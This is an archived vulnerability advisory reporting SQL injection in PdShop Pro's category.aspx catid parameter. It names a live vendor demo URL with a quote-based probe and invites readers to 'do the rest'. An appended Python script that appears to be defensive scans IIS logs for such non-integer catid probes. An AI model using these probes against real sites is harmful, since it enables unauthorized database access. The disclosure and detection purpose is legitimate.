PdShop Pro Online Store System SQL Injection

2010-09-29T00:00:00
ID PACKETSTORM:94349
Type packetstorm
Reporter RoAd_KiLlEr
Modified 2010-09-29T00:00:00

Description

                                        
                                            `-----------------------------------------------------------------------------------------  
PdShop pro Online Store System. SQL-i Vulnerability  
-----------------------------------------------------------------------------------------  
  
[+]Title PdShop pro Online Store System. SQL-i Vulnerability  
[+]Author **RoAd_KiLlEr**  
[+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws  
[+]Tested on Win XP SP 2/3  
---------------------------------------------------------------------------  
[~] Found by **RoAd_KiLlEr**  
[~] Team: Albanian Hacking Crew  
[~] Home: http://inj3ct0r.com/author/2447   
[~] Version: All versions are vulnerable  
[~] Price: $199  
[~] Vendor: http://www.pagedowntech.com/products/  
==========ExPl0iT3d by **RoAd_KiLlEr**==========  
  
[+]Description:  
PageDown Technology has released the Plus Edition of PDshopPro, our ASP online store application. It features Unlimited categories, subcategories, items, featured items, Inventory/Stock control, order status, password recovery, email notifications, order confirmations, and more. The built-in HTML editor allows for full formatting control. Compatible with the popular payment processors.  
  
=========================================  
  
  
  
[+]. SQL-i Vulnerability  
=+=+=+=+=+=+=+=+=  
  
  
[P0C]: http://127.0.0.1/shop/category.aspx?catid=[SQL Injection]  
  
  
  
[L!ve Dem0]: http://demo3.pdshop.net/shop/category.aspx?catid='17  
  
  
  
You get an error. :)  
So it's vulnerable, you try to do the rest ... :P  
  
  
  
===========================================================================================  
[!] Albanian Hacking Crew   
===========================================================================================  
[!] **RoAd_KiLlEr**   
===========================================================================================  
[!] MaiL: sukihack[at]gmail[dot]com  
===========================================================================================  
`
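
Added example (not part of the original advisory and not PdShop code): a log check for the symptom the advisory describes, a request to /shop/category.aspx whose catid is not a plain integer, with a 5xx response marking the error case. The IIS W3C field order, the assumption that catid is always numeric, and the sample log lines are constructed for this example.

```python
import re
from urllib.parse import parse_qsl

# Assumption: IIS W3C extended log with exactly this field order.
FIELDS = "date time cs-method cs-uri-stem cs-uri-query c-ip sc-status".split()
TARGET = "/shop/category.aspx"       # path named in the advisory
INT_RE = re.compile(r"\d{1,10}")     # assumption: catid is a numeric category id

# Constructed sample log lines (documentation IP range 192.0.2.0/24).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2010-09-29 10:01:02 GET /shop/category.aspx catid=17 192.0.2.10 200
2010-09-29 10:01:09 GET /shop/category.aspx catid=%2717 192.0.2.44 500
2010-09-29 10:01:15 GET /shop/item.aspx itemid=5 192.0.2.10 200
2010-09-29 10:02:30 GET /Shop/Category.aspx CatID=17%27 192.0.2.44 200
2010-09-29 10:03:00 GET /shop/category.aspx - 192.0.2.10 200
"""


def suspicious_catid_requests(log_text):
    """Return one record per request to TARGET whose catid is not an integer."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue                          # skip blanks and W3C directives
        parts = line.split()
        if len(parts) != len(FIELDS):
            continue                          # malformed or different format
        rec = dict(zip(FIELDS, parts))
        # IIS/ASP.NET treat the path and parameter names case-insensitively.
        if rec["cs-uri-stem"].lower() != TARGET:
            continue
        query = "" if rec["cs-uri-query"] == "-" else rec["cs-uri-query"]
        # parse_qsl percent-decodes values, so %27 is seen as a quote.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() == "catid" and not INT_RE.fullmatch(value):
                hits.append({
                    "ip": rec["c-ip"],
                    "catid": value,
                    "status": int(rec["sc-status"]),
                    # a 5xx here matches the error the advisory describes
                    "server_error": rec["sc-status"].startswith("5"),
                })
    return hits


if __name__ == "__main__":
    for hit in suspicious_catid_requests(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule is the input check to enforce on catid in the application itself, alongside a parameterized query.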